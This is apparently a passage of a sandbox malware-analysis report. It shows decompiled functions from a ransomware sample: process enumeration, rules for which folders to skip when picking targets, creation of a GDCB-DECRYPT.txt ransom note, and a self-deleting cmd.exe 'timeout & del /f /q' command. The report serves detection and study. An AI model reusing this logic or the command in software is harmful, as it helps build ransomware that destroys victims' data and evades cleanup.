									_t75 = _v24;
									if(Process32NextW(_v20, _t75) != 0 && GetLastError() != 0x12) {
										goto L6;
									}
									goto L17;
								}
								_push(_t77);
								_push( *_t68);
								_v16 = 1;
								if(_a4 != 0) {
									lstrcatW();
									lstrcatW( *_t68, ",");
								} else {
									lstrcpyW();
									lstrcatW( *_t68, ",");
								}
								_a4 =  &(_a4[0]);
								_v12 = _v12 + lstrlenW(_t77) * 2;
								_t79 =  >  ? 1 : _v8;
								_v8 = _t79;
								goto L15;
							}
							L17:
							if(_v16 != 0) {
								_t56 =  *_t68;
								if( *_t56 != 0) {
									 *((short*)( *_t68 + lstrlenW(_t56) * 2 - 2)) = 0;
								}
							}
							 *_a8 = _v12;
						}
						VirtualFree(_t75, 0, 0x8000);
						CloseHandle(_v20);
						_t76 = _v16;
						if(_t76 == 0) {
							VirtualFree( *_t68, _t76, 0x8000);
						}
						return _t76;
					} else {
						VirtualFree(_t75, 0, 0x8000);
						goto L3;
					}
				}
			}

0x0040753d
0x0040753f
0x0040754d
0x0040754f
0x00407556
0x0040755d
0x00407564
0x0040756b
0x00407572
0x00407579
0x00407580
0x00407587
0x0040758e
0x00407595
0x0040759c
0x004075a3
0x004075aa
0x004075b3
0x004075b5
0x004075ba
0x004075e4
0x004075ea
0x004075bc
0x004075c0
0x004075c6
0x004075cc
0x004075d2
0x004075ef
0x004075f1
0x004075f3
0x004075f6
0x004075f9
0x004075fc
0x00407607
0x00000000
0x00407610
0x00407618
0x00407620
0x0040762f
0x00407633
0x00000000
0x00407635
0x00407635
0x00407635
0x00407697
0x00407697
0x004076a6
0x00000000
0x00000000
0x00000000
0x004076a6
0x0040763e
0x0040763f
0x00407641
0x00407648
0x00407665
0x0040766e
0x0040764a
0x0040764a
0x00407657
0x00407657
0x00407670
0x0040768e
0x00407691
0x00407694
0x00000000
0x00407694
0x004076b7
0x004076bb
0x004076bd
0x004076c3
0x004076d0
0x004076d0
0x004076c3
0x004076db
0x004076db
0x004076eb
0x004076f0
0x004076f6
0x004076fb
0x00407705
0x00407705
0x0040770f
0x004075d4
0x004075dc
0x00000000
0x004075dc
0x004075d2

APIs

VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004,74CB66A0,?,7491C0B0), ref: 0040753D
VirtualAlloc.KERNEL32(00000000,00000004,00003000,00000004), ref: 004075B1
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004075C6
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 004075DC
Process32FirstW.KERNEL32(00000000,00000000), ref: 004075FF
lstrcmpiW.KERNEL32(004107DC,-00000024), ref: 00407625
Process32NextW.KERNEL32(?,?), ref: 0040769E
GetLastError.KERNEL32 ref: 004076A8
lstrlenW.KERNEL32(00000000), ref: 004076C6
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 004076EB
CloseHandle.KERNEL32(?), ref: 004076F0
VirtualFree.KERNEL32(?,?,00008000), ref: 00407705

Memory Dump Source

Source File: 00000015.00000002.305258673.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.305252568.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305265358.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305269157.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305279189.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_vkspii.jbxd

Yara matches

Similarity

API ID: Virtual$Free$AllocProcess32$CloseCreateErrorFirstHandleLastNextSnapshotToolhelp32lstrcmpilstrlen
String ID:
API String ID: 2470459410-0
Opcode ID: 3f4a2b444d341badbc1f89ef671cf3f23f637359728da17f4d75482f5b004914
Instruction ID: 1c74ff85e4bbe89c11da167877251bfadadfb1b789393fb2674ad8a1102b1764
Opcode Fuzzy Hash: 3f4a2b444d341badbc1f89ef671cf3f23f637359728da17f4d75482f5b004914
Instruction Fuzzy Hash: DF514D71E04218ABDB109F98DD48B9E7BB4FF85720F20806AE505BB290C7B56D85CF99

Uniqueness

Uniqueness Score: -1.00%

Function 00406110 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 109
memoryCOMMON

Download Yara Rule

C-Code - Quality: 15%

			E00406110(void* __ecx) {
				void* _t9;
				intOrPtr* _t20;
				void* _t42;
				void* _t45;

				_t42 = __ecx;
				_t45 = VirtualAlloc(0, 0x201, 0x3000, 0x40);
				if(E00407BA0(_t42, L"\\ProgramData\\") != 0 || E00407BA0(_t42, L"\\Program Files\\") != 0 || E00407BA0(_t42, L"\\Tor Browser\\") != 0 || E00407BA0(_t42, L"Ransomware") != 0 || E00407BA0(_t42, L"\\All Users\\") != 0) {
					L15:
					VirtualFree(_t45, 0, 0x8000);
					return 0;
				} else {
					_t9 = E00407BA0(_t42, L"\\Local Settings\\");
					if(_t9 != 0) {
						goto L15;
					} else {
						_t20 = __imp__SHGetSpecialFolderPathW;
						_push(_t9);
						_push(0x2a);
						_push(_t45);
						_push(_t9);
						if( *_t20() == 0 || E00407BA0(_t42, _t45) == 0) {
							_push(0);
							_push(0x2b);
							_push(_t45);
							_push(0);
							if( *_t20() == 0 || E00407BA0(_t42, _t45) == 0) {
								_push(0);
								_push(0x24);
								_push(_t45);
								_push(0);
								if( *_t20() == 0 || E00407BA0(_t42, _t45) == 0) {
									_push(0);
									_push(0x1c);
									_push(_t45);
									_push(0);
									if( *_t20() == 0 || E00407BA0(_t42, _t45) == 0) {
										VirtualFree(_t45, 0, 0x8000);
										return 1;
									} else {
										goto L15;
									}
								} else {
									goto L15;
								}
							} else {
								goto L15;
							}
						} else {
							goto L15;
						}
					}
				}
			}

APIs

VirtualAlloc.KERNEL32(00000000,00000201,00003000,00000040,00000000,?,?,00406706,00000000,?,?), ref: 00406123
SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002A,00000000,?,?,00406706,00000000,?,?), ref: 004061AE
SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002B,00000000,?,?,00406706,00000000,?,?), ref: 004061C8
SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000024,00000000,?,?,00406706,00000000,?,?), ref: 004061E2
SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?,?,00406706,00000000,?,?), ref: 004061FC
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00406706,00000000,?,?), ref: 0040621C
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00406706,00000000,?,?), ref: 00406231

Strings

\Tor Browser\, xrefs: 00406153
\Program Files\, xrefs: 0040613F
Ransomware, xrefs: 00406167
\ProgramData\, xrefs: 00406129
\Local Settings\, xrefs: 0040618F
\All Users\, xrefs: 0040617B

Memory Dump Source

Source File: 00000015.00000002.305258673.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.305252568.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305265358.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305269157.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305279189.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_vkspii.jbxd

Yara matches

Similarity

API ID: FolderPathSpecial$Virtual$Free$Alloc
String ID: Ransomware$\All Users\$\Local Settings\$\Program Files\$\ProgramData\$\Tor Browser\
API String ID: 1363212851-106008693
Opcode ID: 04a06f1e15ba69642b496c6929e789c3ce974156cbd8b3f19c2c8875e9bacd52
Instruction ID: f4f5e37f6e05bfd3754b73729b88660f17dd9cd9e6b304112d3c6a2927df81c1
Opcode Fuzzy Hash: 04a06f1e15ba69642b496c6929e789c3ce974156cbd8b3f19c2c8875e9bacd52
Instruction Fuzzy Hash: F4213D3078021233EA2031662D6AB7F299E8BD5749F55447BBA02FA3C5FEBCEC15425D

Uniqueness

Uniqueness Score: -1.00%

Function 00406BA0 Relevance: 20.1, APIs: 16, Instructions: 120
stringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00406BA0(intOrPtr* __ecx) {
				int _t42;
				int _t48;
				int _t51;
				int _t54;
				int _t57;
				int _t60;
				int _t63;
				int _t66;
				int _t70;
				int _t72;
				void* _t75;
				intOrPtr* _t86;
				int _t88;
				int _t89;
				int _t90;
				int _t91;
				int _t92;
				int _t93;
				int _t94;
				void* _t95;

				_t40 = lstrlenW;
				_t86 = __ecx;
				_t75 = 0;
				if( *__ecx != 0) {
					_t72 = lstrlenW( *(__ecx + 8));
					_t3 = lstrlenW( *(_t86 + 4)) + 4; // 0x4
					_t40 = lstrlenW;
					_t75 = _t3 + _t72;
				}
				if( *((intOrPtr*)(_t86 + 0xc)) != 0) {
					_t95 =  *_t40( *((intOrPtr*)(_t86 + 0x14)));
					_t70 = lstrlenW( *(_t86 + 0x10));
					_t7 = _t95 + 4; // 0x4
					_t75 = _t7 + _t70 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x18)) != 0) {
					_t94 = lstrlenW( *(_t86 + 0x20));
					_t66 = lstrlenW( *(_t86 + 0x1c));
					_t11 = _t94 + 4; // 0x4
					_t75 = _t11 + _t66 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x24)) != 0) {
					_t93 = lstrlenW( *(_t86 + 0x2c));
					_t63 = lstrlenW( *(_t86 + 0x28));
					_t15 = _t93 + 4; // 0x4
					_t75 = _t15 + _t63 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x30)) != 0) {
					_t92 = lstrlenW( *(_t86 + 0x38));
					_t60 = lstrlenW( *(_t86 + 0x34));
					_t19 = _t92 + 4; // 0x4
					_t75 = _t19 + _t60 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x3c)) != 0) {
					_t91 = lstrlenW( *(_t86 + 0x44));
					_t57 = lstrlenW( *(_t86 + 0x40));
					_t23 = _t91 + 4; // 0x4
					_t75 = _t23 + _t57 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x48)) != 0) {
					_t90 = lstrlenW( *(_t86 + 0x50));
					_t54 = lstrlenW( *(_t86 + 0x4c));
					_t27 = _t90 + 4; // 0x4
					_t75 = _t27 + _t54 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x54)) != 0) {
					_t89 = lstrlenW( *(_t86 + 0x5c));
					_t51 = lstrlenW( *(_t86 + 0x58));
					_t31 = _t89 + 4; // 0x4
					_t75 = _t31 + _t51 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x60)) != 0) {
					_t75 = _t75 + 0x14;
				}
				if( *((intOrPtr*)(_t86 + 0x74)) != 0) {
					_t88 = lstrlenW( *(_t86 + 0x7c));
					_t48 = lstrlenW( *(_t86 + 0x78));
					_t36 = _t88 + 4; // 0x4
					_t75 = _t36 + _t48 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x80)) == 0) {
					return _t75;
				} else {
					_t42 = lstrlenW( *(_t86 + 0x88));
					return lstrlenW( *(_t86 + 0x84)) + 4 + _t75 + _t42;
				}
			}

APIs

lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406BF2
lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406BFD
lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C13
lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C1E
lstrlenW.KERNEL32(004048B6,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C34
lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C3F
lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C55
lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C60
lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C76
lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C81
lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C97
lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406CA2
lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406CC1
lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406CCC
lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406CE8
lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406CF6

Memory Dump Source

Source File: 00000015.00000002.305258673.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.305252568.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305265358.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305269157.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305279189.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_vkspii.jbxd

Yara matches

Similarity

API ID: lstrlen
String ID:
API String ID: 1659193697-0
Opcode ID: b7784ce1624038f5bbd5c7dcf95e2abfdb0947caf69f15ff149bb7f942ea0507
Instruction ID: 0763c41813d47cec7f7f3bb87dd63c09dcdfaa37f7dde6f7b674e60aab311cac
Opcode Fuzzy Hash: b7784ce1624038f5bbd5c7dcf95e2abfdb0947caf69f15ff149bb7f942ea0507
Instruction Fuzzy Hash: BA412B32200611EFD7125FB8DE8C796BBB2FF04315F094539E416A2A62D775AC78DB88

Uniqueness

Uniqueness Score: -1.00%

Function 00405270 Relevance: 18.1, APIs: 12, Instructions: 92
filestringmemoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405270(WCHAR* __ecx) {
				CHAR* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _t22;
				void* _t24;
				signed int _t26;
				int _t30;
				char _t32;
				void* _t33;
				signed char _t34;
				CHAR* _t36;
				WCHAR* _t37;
				WCHAR* _t38;
				void* _t39;
				CHAR* _t40;

				_t37 = __ecx;
				_t39 = VirtualAlloc(0, 0x404, 0x3000, 0x40);
				_v20 = _t39;
				GetModuleFileNameW(0, _t39, 0x200);
				_t33 = CreateFileW(_t39, 0x80000000, 1, 0, 3, 0x80, 0);
				_v16 = _t33;
				if(_t33 != 0xffffffff) {
					_t22 = CreateFileMappingW(_t33, 0, 8, 0, 0, 0);
					_v24 = _t22;
					if(_t22 != 0) {
						_t24 = MapViewOfFile(_t22, 1, 0, 0, 0);
						_v12 = _t24;
						if(_t24 != 0) {
							_t5 = _t24 + 0x4e; // 0x4e
							_t40 = _t5;
							_v8 = _t40;
							_t26 = lstrlenW(_t37);
							_t34 = 0;
							_t38 =  &(_t37[_t26]);
							if(lstrlenA(_t40) + _t27 != 0) {
								_t36 = _t40;
								do {
									if((_t34 & 0x00000001) != 0) {
										 *((char*)(_t38 + _t34)) = 0;
									} else {
										_t32 =  *_t40;
										_t40 =  &(_t40[1]);
										 *((char*)(_t38 + _t34)) = _t32;
									}
									_t34 = _t34 + 1;
									_t30 = lstrlenA(_t36);
									_t36 = _v8;
								} while (_t34 < _t30 + _t30);
							}
							UnmapViewOfFile(_v12);
							_t33 = _v16;
							_t39 = _v20;
						}
						CloseHandle(_v24);
					}
					CloseHandle(_t33);
				}
				return VirtualFree(_t39, 0, 0x8000);
			}

APIs

VirtualAlloc.KERNEL32(00000000,00000404,00003000,00000040,00000000,74CF81D0,00000000,?,?,?,?,00405482), ref: 00405289
GetModuleFileNameW.KERNEL32(00000000,00000000,00000200,?,?,?,?,00405482), ref: 0040529C
CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,00405482), ref: 004052B5
CreateFileMappingW.KERNEL32(00000000,00000000,00000008,00000000,00000000,00000000,?,?,?,?,00405482), ref: 004052D4
MapViewOfFile.KERNEL32(00000000,00000001,00000000,00000000,00000000,?,?,?,?,00405482), ref: 004052EA
lstrlenW.KERNEL32(?,?,?,?,?,00405482), ref: 004052FE
lstrlenA.KERNEL32(0000004E,?,?,?,?,00405482), ref: 0040530A
lstrlenA.KERNEL32(0000004E,?,?,?,?,00405482), ref: 00405329
UnmapViewOfFile.KERNEL32(?,?,?,?,?,00405482), ref: 0040533B
CloseHandle.KERNEL32(?,?,?,?,?,00405482), ref: 0040534A
CloseHandle.KERNEL32(00000000,?,?,?,?,00405482), ref: 00405351
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,00405482), ref: 0040535F

Memory Dump Source

Source File: 00000015.00000002.305258673.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.305252568.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305265358.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305269157.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305279189.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_vkspii.jbxd

Yara matches

Similarity

API ID: File$lstrlen$CloseCreateHandleViewVirtual$AllocFreeMappingModuleNameUnmap
String ID:
API String ID: 869890170-0
Opcode ID: 8d8f66e7a3aa33aaa14d7d124576a6fa184a176826b3374fbd9b00ab5f319adc
Instruction ID: 2f98b26bd8e2ee7d85d2e29faddfdf40e9a873387be652c4beaa2a3b1dd5d715
Opcode Fuzzy Hash: 8d8f66e7a3aa33aaa14d7d124576a6fa184a176826b3374fbd9b00ab5f319adc
Instruction Fuzzy Hash: 4231A531740715BBEB205B649D4EF5E7B68EB05B40F200075FB41BA2D2C6F5A9018FAC

Uniqueness

Uniqueness Score: -1.00%

Function 00406640 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 59
filememorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406640(void* __ecx) {
				long _v8;
				WCHAR* _t7;
				signed int _t16;
				void* _t21;
				void* _t22;
				void* _t25;

				_t25 = VirtualAlloc(0, 0x402, 0x3000, 0x40);
				wsprintfW(_t25, L"%s\\GDCB-DECRYPT.txt", _t21);
				_t22 = CreateFileW(_t25, 0x40000000, 0, 0, 1, 0x80, 0);
				if(_t22 != 0xffffffff) {
					_t7 =  *0x412b04; // 0x412000
					if(_t7 != 0) {
						WriteFile(_t22,  *0x412b04, lstrlenW(_t7) + _t11,  &_v8, 0);
					}
					CloseHandle(_t22);
					_t16 = 1;
				} else {
					_t16 = 0 | GetLastError() == 0x000000b7;
				}
				VirtualFree(_t25, 0, 0x8000);
				return _t16;
			}

0x0040665b
0x00406663
0x00406685
0x0040668a
0x0040669e
0x004066a5
0x004066be
0x004066be
0x004066c5
0x004066cb
0x0040668c
0x00406699
0x00406699
0x004066d8
0x004066e6

APIs

VirtualAlloc.KERNEL32(00000000,00000402,00003000,00000040,00000000,?,?,?,?,00406722,00000000,?,?), ref: 00406655
wsprintfW.USER32 ref: 00406663
CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000001,00000080,00000000,?,?), ref: 0040667F
GetLastError.KERNEL32(?,?), ref: 0040668C
lstrlenW.KERNEL32(00412000,?,00000000,?,?), ref: 004066AE
WriteFile.KERNEL32(00000000,00000000,?,?), ref: 004066BE
CloseHandle.KERNEL32(00000000,?,?), ref: 004066C5
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?), ref: 004066D8

Strings

%s\GDCB-DECRYPT.txt, xrefs: 0040665D

Memory Dump Source

Source File: 00000015.00000002.305258673.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.305252568.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305265358.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305269157.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305279189.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_vkspii.jbxd

Yara matches

Similarity

API ID: FileVirtual$AllocCloseCreateErrorFreeHandleLastWritelstrlenwsprintf
String ID: %s\GDCB-DECRYPT.txt
API String ID: 2985722263-4054134092
Opcode ID: bc3a2ebfe9eeb877b40095771c2eb21f56d946499f613914195d7b6821dfde9f
Instruction ID: 9b1f1ee7684b205ce34ce946b48542e85b02e5c2206a3fbb18e6830c08f85e02
Opcode Fuzzy Hash: bc3a2ebfe9eeb877b40095771c2eb21f56d946499f613914195d7b6821dfde9f
Instruction Fuzzy Hash: 2D0171753802107BF7205B64AE4EFAA3A6CEB49B15F100135FB05F91E1DBF96C11866D

Uniqueness

Uniqueness Score: -1.00%

Function 00404FD0 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 37
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404FD0() {
				WCHAR* _t6;
				short* _t8;

				_t6 = VirtualAlloc(0, 0x400, 0x3000, 4);
				_t8 = VirtualAlloc(0, 0x400, 0x3000, 4);
				if(_t6 != 0) {
					GetModuleFileNameW(0, _t6, 0x200);
					if(_t8 != 0) {
						wsprintfW(_t8, L"/c timeout -c 5 & del \"%s\" /f /q", _t6);
						ShellExecuteW(0, L"open", L"cmd.exe", _t8, 0, 0);
					}
				}
				ExitProcess(0);
			}

0x00404ff6
0x00404ffa
0x00404ffe
0x00405008
0x00405010
0x00405019
0x00405033
0x00405033
0x00405010
0x0040503b

APIs

VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004,00000000,?,0040526B,00000000), ref: 00404FE6
VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004), ref: 00404FF8
GetModuleFileNameW.KERNEL32(00000000,00000000,00000200), ref: 00405008
wsprintfW.USER32 ref: 00405019
ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 00405033
ExitProcess.KERNEL32 ref: 0040503B

Strings

/c timeout -c 5 & del "%s" /f /q, xrefs: 00405013
open, xrefs: 0040502C
cmd.exe, xrefs: 00405027

Memory Dump Source

Source File: 00000015.00000002.305258673.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.305252568.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305265358.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305269157.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305279189.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_vkspii.jbxd

Yara matches

Similarity

API ID: AllocVirtual$ExecuteExitFileModuleNameProcessShellwsprintf
String ID: /c timeout -c 5 & del "%s" /f /q$cmd.exe$open
API String ID: 4033023619-516011104
Opcode ID: e6b0716a671a28e0b9e882897ebb5d15568001f9354c485655236bd259232091
Instruction ID: 72ce1eeed403cc9d60347bc981b2010fd1fdc34af71b64a0c2a2ed5fbb2db01d
Opcode Fuzzy Hash: e6b0716a671a28e0b9e882897ebb5d15568001f9354c485655236bd259232091
Instruction Fuzzy Hash: E2F0C971BC572277F2351B655D0FF4B2D689B85F56F250036BB087E2D28AF468008AED

Uniqueness

Uniqueness Score: -1.00%

Function 00403200 Relevance: 13.6, APIs: 7, Strings: 2, Instructions: 73
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403200(void* __ecx, char _a4, intOrPtr _a8) {
				char _t5;
				char _t6;
				intOrPtr _t8;
				int _t10;
				CHAR* _t13;
				int _t15;
				void* _t18;
				CHAR* _t21;
				CHAR* _t23;

				_t1 =  &_a4; // 0x405135
				_t23 =  *_t1;
				_t18 = __ecx;
				_t5 =  *_t23;
				if(_t5 == 0) {
					L4:
					_t6 =  *_t23;
					if(_t6 == 0x7d) {
						goto L10;
					} else {
						_t21 = _t23;
						if(_t6 != 0) {
							while( *_t21 != 0x7d) {
								_t21 =  &(_t21[1]);
								if( *_t21 != 0) {
									continue;
								} else {
								}
								goto L12;
							}
							 *_t21 = 0;
						}
						L12:
						_t8 = _a8;
						if(_t8 != 1) {
							if(_t8 == 2) {
								_t10 = lstrlenA(_t23);
								_t13 = HeapAlloc(GetProcessHeap(), 8, _t10 + 1);
								 *(_t18 + 8) = _t13;
								goto L16;
							}
						} else {
							_t15 = lstrlenA(_t23);
							_t13 = HeapAlloc(GetProcessHeap(), 8, _t15 + 1);
							 *(_t18 + 4) = _t13;
							L16:
							if(_t13 != 0) {
								lstrcpyA(_t13, _t23);
							}
						}
						 *_t21 = 0x7d;
						return 1;
					}
				} else {
					while(_t5 != 0x7d) {
						_t23 =  &(_t23[1]);
						if(_t5 == 0x3d) {
							goto L4;
						} else {
							_t5 =  *_t23;
							if(_t5 != 0) {
								continue;
							} else {
								goto L4;
							}
						}
						goto L19;
					}
					L10:
					return 0;
				}
				L19:
			}

APIs

lstrlenA.KERNEL32(5Q@,00000000,?,5Q@,?,004034BF,5Q@,00000001,5Q@,00000000,?,74CB66A0,?,?,00405135,00000000), ref: 00403251
GetProcessHeap.KERNEL32(00000008,00000001,?,004034BF,5Q@,00000001,5Q@,00000000,?,74CB66A0,?,?,00405135,00000000), ref: 0040325B
HeapAlloc.KERNEL32(00000000,?,004034BF,5Q@,00000001,5Q@,00000000,?,74CB66A0,?,?,00405135,00000000), ref: 00403262
lstrlenA.KERNEL32(5Q@,00000000,?,5Q@,?,004034BF,5Q@,00000001,5Q@,00000000,?,74CB66A0,?,?,00405135,00000000), ref: 00403273
GetProcessHeap.KERNEL32(00000008,00000001,?,004034BF,5Q@,00000001,5Q@,00000000,?,74CB66A0,?,?,00405135,00000000), ref: 0040327D
HeapAlloc.KERNEL32(00000000,?,004034BF,5Q@,00000001,5Q@,00000000,?,74CB66A0,?,?,00405135,00000000), ref: 00403284
lstrcpyA.KERNEL32(00000000,5Q@,?,004034BF,5Q@,00000001,5Q@,00000000,?,74CB66A0,?,?,00405135,00000000), ref: 00403293

Strings

5Q@, xrefs: 00403203
5Q@, xrefs: 00403205, 00403250, 00403272, 00403291

Memory Dump Source

Source File: 00000015.00000002.305258673.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.305252568.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305265358.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305269157.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305279189.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_vkspii.jbxd

Yara matches

Similarity

API ID: Heap$AllocProcesslstrlen$lstrcpy
String ID: 5Q@$5Q@
API String ID: 511007297-547021831
Opcode ID: b788b534275cfb914030b1c27688c49dd11fa4b54458ea966c16f7cdcb022cd9
Instruction ID: bda05b356578e7771a31f68481e16acc2b94da25dd7eb2ac23c0ab8e8a28fe1a
Opcode Fuzzy Hash: b788b534275cfb914030b1c27688c49dd11fa4b54458ea966c16f7cdcb022cd9
Instruction Fuzzy Hash: 9A119330504295AAEB211F68990C767BF5CAF12352F2440BFE8C5FB391C7398D4687A9

Uniqueness

Uniqueness Score: -1.00%

Function 00403DE0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136
memorythreadCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00403DE0(struct _SECURITY_ATTRIBUTES* __ecx) {
				char _v612;
				char _v644;
				void* _v908;
				void* _v912;
				intOrPtr _v916;
				intOrPtr _v920;
				short _v924;
				signed int _v928;
				intOrPtr _v932;
				void* _v936;
				intOrPtr _v940;
				intOrPtr _v944;
				intOrPtr _v948;
				long _v952;
				struct _SECURITY_ATTRIBUTES* _v956;
				struct _SECURITY_ATTRIBUTES* _v960;
				struct _SECURITY_ATTRIBUTES* _v964;
				char _v968;
				void* _t67;
				short _t68;
				intOrPtr _t69;
				int _t72;
				long _t75;
				signed int _t77;
				signed int _t80;
				intOrPtr* _t82;
				void* _t84;
				struct _SECURITY_ATTRIBUTES* _t87;
				long _t88;
				intOrPtr _t89;
